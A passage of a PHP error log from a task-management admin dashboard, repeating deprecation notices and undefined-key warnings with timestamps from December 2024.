Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [18-Dec-2024 00:56:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [18-Dec-2024 00:56:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [18-Dec-2024 00:56:47 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [18-Dec-2024 00:56:47 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [18-Dec-2024 00:57:01 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 00:58:30 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 00:58:57 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 00:59:56 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:00:32 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:00:57 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:01:10 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:01:11 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:01:27 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:02:03 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:02:29 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:02:47 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:03:02 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:03:16 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:03:30 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:11:42 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:12:50 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:12:56 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:13:46 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:13:53 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:13:58 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:14:04 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:14:31 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:14:44 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:14:51 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:16:02 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:16:15 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:16:45 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:16:51 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:16:58 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:17:22 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:17:28 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:18:23 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:19:27 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:19:33 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:19:41 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:20:00 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:20:31 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:20:37 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:21:55 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:22:12 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:22:34 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:22:41 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:22:56 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:23:03 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:23:22 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:24:24 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:36:08 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:37:26 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/ongoingtasks.php on line 19 [18-Dec-2024 01:52:30 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [18-Dec-2024 10:54:01 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [18-Dec-2024 10:54:09 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [18-Dec-2024 10:54:09 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [18-Dec-2024 10:54:36 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [18-Dec-2024 10:54:36 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [18-Dec-2024 10:58:53 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [18-Dec-2024 10:58:59 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [18-Dec-2024 10:58:59 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [18-Dec-2024 10:59:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [18-Dec-2024 10:59:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [19-Dec-2024 13:45:30 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [19-Dec-2024 13:46:27 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [19-Dec-2024 13:46:32 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [19-Dec-2024 13:59:26 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [19-Dec-2024 13:59:26 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [19-Dec-2024 13:59:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [19-Dec-2024 13:59:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [19-Dec-2024 14:00:04 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [19-Dec-2024 14:00:04 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [19-Dec-2024 14:03:35 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [19-Dec-2024 14:03:51 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [19-Dec-2024 14:08:59 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [19-Dec-2024 14:08:59 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [19-Dec-2024 14:16:43 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [19-Dec-2024 14:16:43 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [19-Dec-2024 14:17:39 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [19-Dec-2024 14:17:39 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [19-Dec-2024 14:17:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [19-Dec-2024 14:17:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [19-Dec-2024 14:18:23 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [19-Dec-2024 14:18:23 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [19-Dec-2024 14:19:40 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [19-Dec-2024 14:19:40 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [19-Dec-2024 14:19:59 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [19-Dec-2024 14:19:59 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [19-Dec-2024 14:20:35 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [19-Dec-2024 14:20:47 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [19-Dec-2024 14:20:47 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [19-Dec-2024 14:22:45 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [19-Dec-2024 14:23:35 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [19-Dec-2024 15:10:16 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [19-Dec-2024 15:10:27 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [19-Dec-2024 15:39:50 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [19-Dec-2024 15:40:01 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [19-Dec-2024 15:40:01 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [19-Dec-2024 15:56:20 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [19-Dec-2024 15:56:49 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 23 [19-Dec-2024 15:57:11 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 23 [19-Dec-2024 15:59:01 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [19-Dec-2024 15:59:01 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [19-Dec-2024 15:59:31 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [19-Dec-2024 15:59:31 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [19-Dec-2024 16:04:04 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [19-Dec-2024 16:09:36 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [19-Dec-2024 16:20:10 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [19-Dec-2024 16:20:32 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [19-Dec-2024 16:25:03 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [20-Dec-2024 11:11:27 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [20-Dec-2024 11:11:48 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [20-Dec-2024 11:35:09 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [20-Dec-2024 11:35:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [20-Dec-2024 11:35:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [20-Dec-2024 11:37:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [20-Dec-2024 11:37:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [20-Dec-2024 12:53:09 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [20-Dec-2024 12:53:36 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [20-Dec-2024 13:13:15 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [20-Dec-2024 13:13:18 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [20-Dec-2024 13:13:18 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [20-Dec-2024 13:52:00 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [20-Dec-2024 13:52:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [20-Dec-2024 13:52:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [20-Dec-2024 17:50:49 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Dec-2024 06:24:57 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Dec-2024 06:25:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [23-Dec-2024 06:25:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [23-Dec-2024 06:43:12 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [23-Dec-2024 06:43:12 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [23-Dec-2024 06:44:37 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [23-Dec-2024 06:44:37 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [23-Dec-2024 06:44:57 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Dec-2024 06:45:09 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [23-Dec-2024 06:45:09 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [23-Dec-2024 06:46:27 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Dec-2024 14:23:39 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Dec-2024 14:24:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [23-Dec-2024 14:24:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [23-Dec-2024 14:28:24 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Dec-2024 14:36:36 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Dec-2024 16:55:44 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Dec-2024 16:56:01 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [23-Dec-2024 16:56:01 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [23-Dec-2024 16:59:06 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Dec-2024 16:59:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [23-Dec-2024 16:59:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [23-Dec-2024 17:02:00 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [23-Dec-2024 17:02:00 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [23-Dec-2024 17:02:28 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [23-Dec-2024 17:02:28 Australia/Sydney] PHP Deprecated: htmlspecialchars(): 